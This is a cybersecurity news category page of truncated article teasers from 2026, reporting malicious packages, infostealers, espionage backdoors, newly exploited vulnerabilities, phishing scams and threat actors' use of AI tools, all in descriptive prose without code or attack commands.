Category: Cybersecurity

Malicious agent-skill uploads have slipped past detection tools used by ClawHub, Cisco and Vercel-linked scanning services, raising fresh concern over the security of fast-growing marketplaces that distribute third-party capabilities for AI agents.The findings point to a widening supply-chain problem around “skills”, the modular instruction-and-file packages that allow AI agents to perform tasks such as editing documents, running scripts, managing workflows or connecting with external services. Unlike conventional software packages, these skills may combine code, natural-language instructions, metadata and bundled files,

Cybercriminal groups are shifting phishing campaigns from fake login pages to malware-led intrusions that silently extract passwords, browser cookies, session tokens, cryptocurrency wallet data and other sensitive information from infected devices.The change marks a significant turn in online fraud tactics. Classic phishing pages still imitate banks, cloud services, delivery firms and workplace platforms, but attackers are increasingly using emails, search ads, fake software installers, messaging apps and compromised websites to deliver infostealer malware. Once installed, these tools can collect far

Cyber espionage operators are using a newly documented Windows backdoor called HazyBeacon to target government networks in Southeast Asia, turning legitimate Amazon Web Services infrastructure into a covert command-and-control channel that can blend into ordinary cloud traffic.The activity, tracked as CL-STA-1020, has been linked to intelligence-gathering operations focused on sensitive state information, including material tied to tariffs, trade disputes and government policy discussions. Security researchers have identified the campaign as part of a wider movement by advanced threat actors away

Security researchers have warned that a Windows Search URI handler weakness can leak NTLMv2 hashes to remote attackers through a crafted link, reviving concerns over long-running authentication risks in enterprise networks.The issue affects the search: handler used by Windows Explorer to process desktop search requests. A malicious link can direct the handler towards an attacker-controlled network path, causing the victim’s system to attempt authentication over SMB and transmit a Net-NTLMv2 hash before an error message appears. The attack requires user

Attackers have compromised Red Hat’s official @redhat-cloud-services namespace on npm, inserting credential-stealing malware into dozens of package releases used in cloud console development and software build pipelines.The breach, identified on 1 June 2026, affected at least 32 package releases across the Red Hat Cloud Services ecosystem, including frontend components, generated API clients and supporting developer tooling linked to the Red Hat Hybrid Cloud Console. The malicious versions were designed to execute automatically during installation, giving the attackers a route into

A threat actor has used artificial intelligence coding tools to build and refine malware intended to bypass endpoint detection and response systems, highlighting how generative AI is being folded into practical cyberattack development rather than remaining a theoretical risk.The activity was presented as a red team project, but the discovered framework pointed to stealthy post-exploitation operations, including ransomware deployment and data theft. The case shows how attackers are adapting tools used by legitimate developers and security testers to accelerate malware

Anthropic is expanding access to Claude Mythos Preview through Project Glasswing, widening a controlled cybersecurity programme at a time when North Korean-linked hackers are sharpening attacks against macOS users in the financial, venture capital, Web3 and cryptocurrency sectors.The San Francisco-based AI company plans to increase the number of Project Glasswing partners from about 50 to roughly 200 organisations across more than 15 countries, broadening access to a model designed to identify and help fix serious software vulnerabilities. The expansion comes

Hackers have used 34 malicious open-source packages across npm, PyPI and Crates. io to steal cloud credentials, crypto wallet data, SSH keys and developer secrets, exposing a widening security gap in software supply chains used by blockchain, artificial intelligence and cloud engineering teams.The campaign, tracked as TrapDoor, spans more than 384 package versions and artefacts. It targets developers working in cryptocurrency, DeFi, Solana, Sui, Move, AI tooling and cloud environments, where a single workstation can hold access to source code,

A critical weakness in Flowise has exposed self-hosted AI workflow servers to full compromise, after technical details and working exploit code showed that a logged-in user could trigger command execution by importing a crafted chatflow.The flaw, tracked as CVE-2026-40933, affects Flowise deployments before version 3.1.0 and carries a 9.9 severity score. It stems from the way Flowise handles Model Context Protocol, or MCP, configurations in its Custom MCP tool. A malicious configuration can abuse the stdio transport to cause the

Palo Alto Networks customers are facing renewed pressure to patch internet-facing security systems after attackers began exploiting a high-severity authentication bypass flaw in PAN-OS GlobalProtect, a product widely used to provide remote access to corporate networks.The vulnerability, tracked as CVE-2026-0257, affects GlobalProtect portal and gateway deployments in PAN-OS where authentication override cookies are enabled alongside a specific certificate configuration. Successful exploitation can allow a remote attacker without valid credentials to bypass security restrictions and establish an unauthorised VPN connection, potentially

Hackers are using targeted spearphishing emails to deploy AZUREVEIL, an Adaptix-based command-and-control agent, against government and enterprise-linked targets in the Czech Republic and Taiwan, underscoring the growing use of trusted cloud services to mask cyber-espionage activity.The campaign, tracked as Operation Dragon Weave, begins with a malicious ZIP archive carrying files designed to appear as official documents. Once opened, the archive can trigger a multi-stage infection chain that uses deceptive file names, script execution, DLL sideloading and a Rust-based loader before

SolyxImmortal, a Python-based information-stealing malware, is drawing attention from cyber defenders because of its ability to combine browser credential theft, document harvesting, keystroke logging and screen surveillance inside a single Windows implant.Technical analysis shows the malware is designed to operate quietly on compromised machines, using common Python libraries, Windows features and multi-threaded execution to run several data-collection functions at the same time. Its targets include saved browser passwords, cookies, text files, PDFs, Word documents, Excel files, screenshots and keyboard input,

Cybercriminals are exploiting trust in artificial intelligence platforms by abusing shared ChatGPT and Claude content links to steer users towards malware disguised as legitimate OpenAI software.The campaign, tracked by security researchers as LLMShare, uses malicious search advertisements and search-engine manipulation to lure victims to pages that appear to be hosted on trusted AI domains. Once users click through, they are shown a fully designed web page carrying ChatGPT-style branding, including fake outage notices and prompts to download a supposed ChatGPT

A destructive cyber campaign tied to Iran-linked operators has targeted organisations in the Middle East and abroad, deleting virtual machines, databases, partitions and backup repositories in attacks designed to cripple recovery as well as disrupt daily operations.The activity has been linked by forensic investigators to infrastructure and tactics associated with Black Shadow, a long-running threat group assessed by Israeli authorities and private researchers as operating on behalf of Iran’s Ministry of Intelligence and Security. The operation marks a shift from

Instagram is under renewed pressure over claims that a weakness in Meta’s AI-assisted support and account recovery systems could allow attackers to manipulate password reset flows and target high-value accounts.The allegation centres on an AI-powered help feature intended to guide users through account recovery, settings changes and login problems. Security researchers say the system could allegedly be prompted in ways that allowed unauthorised parties to trigger or redirect password reset actions without adequate identity checks. Meta has not publicly confirmed

Hackers are using fake Signal support messages to trick users into handing over backup recovery keys, opening a new front in attacks against one of the world’s most trusted encrypted messaging platforms.The campaign centres on messages sent inside Signal from accounts posing as “Signal Support”. Targets are warned that their backed-up chats and media face permanent loss because of a supposed sync problem. They are then urged to paste their backup recovery key into the chat to “relink” their archive.

A malicious NuGet package posing as a Sicoob software development kit has exposed sensitive banking authentication data, intensifying concerns over attacks that exploit trust in open-source developer ecosystems.The package, published as Sicoob. Sdk, was presented as a C# SDK for integrations with Sicoob, one of Brazil’s largest cooperative financial systems. Versions 2.0.0 to 2.0.4 were found to collect client IDs, PFX passwords and base64-encoded PFX certificate archives when developers used the package to configure banking API connections. The package first

Trusted software development tools have become a prime attack channel as adversaries target the systems that programmers use to build, test and deploy code, exposing companies to stolen credentials, leaked source code and compromised software pipelines.The warning has sharpened after multiple campaigns hit developer ecosystems during May, including a poisoned Visual Studio Code extension linked to Nx Console and a large-scale GitHub Actions operation known as Megalodon. Together, the incidents show how attackers are moving beyond conventional phishing and malware

Russia-linked cyber operators tracked as GREYVIBE have used generative artificial intelligence tools including ChatGPT and Google Gemini to widen cyber-espionage operations against Ukraine-linked targets, signalling a shift in how lower-skilled threat groups can build lures, malware and infrastructure at speed.The activity, active since at least August 2025, has targeted military, government, civilian and business-related organisations through phishing emails, fake verification pages, fraudulent websites and custom malware. The operators are assessed to be Russian-speaking, working largely within Moscow time, and focused

Google has made Device Bound Session Credentials generally available in Chrome for Windows, widening access to a security feature designed to blunt one of the most common routes into compromised online accounts: stolen session cookies.The move gives Chrome users and organisations a stronger layer of protection after login, where many account takeovers now occur even when passwords and multi-factor authentication have already been passed. DBSC links a user’s authenticated web session to the device on which it was created, making

Cybersecurity teams are racing to patch a Palo Alto Networks authentication-bypass flaw after confirmed exploitation against exposed GlobalProtect deployments raised the risk profile of a vulnerability first disclosed this month.Tracked as CVE-2026-0257, the flaw affects PAN-OS firewalls and Prisma Access environments where GlobalProtect portal or gateway services are configured with authentication override cookies and a vulnerable certificate setup. Successful exploitation allows an unauthenticated remote attacker to bypass normal VPN authentication controls and establish an unauthorised GlobalProtect connection, creating a path

China-linked hacking groups have used the Middle East war to intensify cyber-espionage attempts against maritime, energy and political targets across the Gulf, exposing how regional conflict is being turned into an intelligence-gathering opportunity for rival powers.The activity, tracked between October 2025 and March 2026, shows threat actors aligned with Beijing moving quickly around geopolitical shocks, particularly after the escalation involving Iran from late February. Maritime affairs, oil flows, energy infrastructure, government networks and strategic technologies have emerged as priority targets,

Cybercriminals are shifting from crude misspellings of trusted software packages to more convincing names that appear to belong inside legitimate developer ecosystems, raising fresh concern across open-source security teams and enterprise software supply chains.The change marks a significant evolution in package impersonation attacks. Rather than relying only on a developer mistyping a package name, malicious publishers are creating packages that look like natural extensions, plugins, configuration tools, SDKs, wrappers or versioned variants of widely used projects. The tactic exploits the

Hackers are using illegal streaming and digital library websites to spread cryptocurrency miners and remote access malware through fake video player updates, exposing millions of visitors to stealthy infections that can drain computing power and give attackers remote control over compromised systems.The campaign targets users who attempt to watch pirated films or television shows. Instead of loading the video, the website displays a warning that a video player plugin is outdated and must be updated before playback can continue. Users

Carnival Corporation has begun notifying nearly 6 million people after a cyber intrusion exposed personal information, intensifying scrutiny of data protection practices at one of the world’s largest cruise operators.The Miami-based company said unauthorised activity was detected on April 14 after an attacker used social engineering to deceive an employee and gain access to a limited part of its IT environment. Regulatory filings show 5,995,277 people were affected, including 9,746 residents of Maine, where the incident was formally reported to

Cryptocurrency developers have become the focus of a new macOS-focused cyber campaign that uses fake recruiter approaches, malicious meeting links and compromised software pipelines to steal digital assets and spread malware through trusted internal systems.The activity is being tracked as JINX-0164, a previously unreported financially motivated threat actor active since at least mid-2025. Investigators found that the group has targeted cryptocurrency organisations by approaching developers and employees through credible LinkedIn profiles, then steering them towards bogus online meeting platforms or

Hackers are using GHOSTYNETWORKS and OMEGATECH to sustain a global JavaScript malware operation that has targeted organisations across energy, finance, retail, automotive and government-linked sectors, underlining the expanding role of bulletproof hosting in large-scale email fraud.The campaign, tracked across March 2026 activity, used malicious ZIP and RAR attachments to deliver an obfuscated JavaScript backdoor through malspam waves sent to victims in multiple regions. Targets included energy companies, finance ministries and commercial groups, with evidence pointing to financially motivated activity designed

Motorola has disabled a phone software behaviour that routed some Amazon Shopping app launches through web tracking links before opening the app, after users and technology researchers found affiliate referral codes being inserted into shopping sessions without clear notice.The issue centred on Motorola’s preinstalled Smart Feed and Moto App Launcher experience, which appeared to intercept launches of Amazon from the app drawer on certain devices. Instead of opening Amazon directly, affected phones briefly opened a browser, passed through a tracking

Cybercriminals behind the ClearFake campaign have shifted deeper into blockchain-based command infrastructure, using BNB Smart Chain testnet contracts to deliver malicious code and frustrate conventional takedown efforts.The campaign marks an escalation in the abuse of decentralised infrastructure for malware operations. Instead of relying on domains, hosting providers or disposable servers that can be suspended, the operators are storing payload logic and routing instructions inside smart contracts on a public blockchain test network. Once written to the chain, the data is

Roundcube Webmail administrators are being pressed to install emergency updates after maintainers fixed a set of security flaws that could expose email systems to database manipulation, script injection, server-side request forgery and other attacks.Versions 1.6.16 and 1.7.1, released on 24 May 2026, address vulnerabilities affecting the 1.6 long-term support line and the 1.7 branch. The most closely watched issue is a pre-authentication SQL injection flaw in the virtuserquery plugin, where a backslash escape bypass in pregreplace could allow attackers to

Cybercriminals are exploiting mounting demand for the 2026 FIFA World Cup by creating spoofed FIFA-themed websites designed to steal personal details, payment data and money from fans seeking tickets, hospitality packages, jobs and tournament information.The warning, issued by the Federal Bureau of Investigation on May 27, 2026, places FIFA impersonation scams among the key online threats facing supporters before and during the tournament across the United States, Canada and Mexico. The campaign relies on lookalike domains, altered web addresses and

InMotion Hosting said it contained a critical cPanel and WHM authentication-bypass flaw that threatened one of the web-hosting industry’s most widely used management platforms, after blocking exposure across its network and patching affected systems.The vulnerability, tracked as CVE-2026-41940, created a high-impact route for unauthenticated attackers to gain access to cPanel and WebHost Manager interfaces. The issue drew urgent attention because cPanel is used by hosting providers, resellers and site administrators to manage domains, files, email, databases, security certificates and server-level

Cybersecurity researchers have warned that BTMOB, an Android remote access trojan, has developed into a potent tool for criminals seeking to hijack smartphones, steal data and run fraud from compromised devices.The malware, first identified in early 2025, has moved beyond the narrower behaviour associated with many banking trojans. It can capture screens, record activity, manage files, intercept credentials, control device functions and give an attacker near-live access to a victim’s handset. Its evolution is drawing close attention because it combines

State Bank of India has warned customers against a phishing campaign that falsely claims its YONO app will be deactivated unless Aadhaar details are updated through a shared link or APK file.The country’s largest lender has said the messages are fraudulent and should be ignored. Customers have been advised not to download files received through SMS, WhatsApp, email or social media, and not to share account details, Aadhaar numbers, passwords, PINs or one-time passwords with anyone. The warning follows the